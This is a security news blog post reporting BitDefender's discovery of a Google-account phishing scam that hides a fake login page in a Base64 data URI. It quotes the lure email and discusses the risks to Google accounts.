Google Phishing Scam Uses a New Tactic

Sue Marquette Poremba
Slide Show

The 11 Essentials of Enterprise Security

In what is becoming old news, passwords are under attack again. This time the passwords in question are those used for Google accounts. The form of attack is through a sophisticated phishing scam, according to the BitDefender researchers who first discovered it. According to eSecurity Planet, this is what users receive:

A spam e-mail with the subject line "Mail Notice" or "New Lockout Notice" states, "This is a reminder that your email account will be locked out in 24 hours. Due to not being able to increase your Email storage Quota. Go to the INSTANT INCREASE to increase your Email storage automatically."

What makes this piece of spam unusually wicked is that security methods that would normally block the spam aren’t able to catch it. The attack itself is based on data uniform resource identifiers (URI) found in a URL. A Help Net Security article went on to explain:

The data URI scheme allows scammers to include data in-line in Web pages as if they were external resources. The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake Web page in an encoded string within the data URI.

Google Chrome doesn’t show the entire string, so even the most vigilant users will have trouble spotting the problem. Oh yeah, and it isn’t just Google Chrome that is affected; Firefox users are also at risk from this scam. (This news, on top of the recent problems for every version of Internet Explorer makes me wonder how anyone can surf the Internet securely these days.)

It’s not hard to figure out why this phishing scam is so alarming. It isn’t only because it is so tricky and devious and hard to detect. It is also because of what the hackers will have access to if they grab your Google password. As Catalin Cosoi, chief security strategist at BitDefender, said in a CSO article:

…With access to a person's Google account, criminals could do all sorts of things - from purchasing apps on Google Play, to compromising email and documents, or expanding the attack to the victim's social circle via email or Google+.

Let’s not forget about hackers gaining access to sensitive work files that may be stored in Google Drive.

But what I didn’t see mentioned was how or if this will affect Android devices, and I think that’s an important question that needs to be answered.

Add Comment      Leave a comment on this blog post

Post a comment





(Maximum characters: 1200). You have 1200 characters left.




Subscribe to our Newsletters

Sign up now and get the best business technology insights direct to your inbox.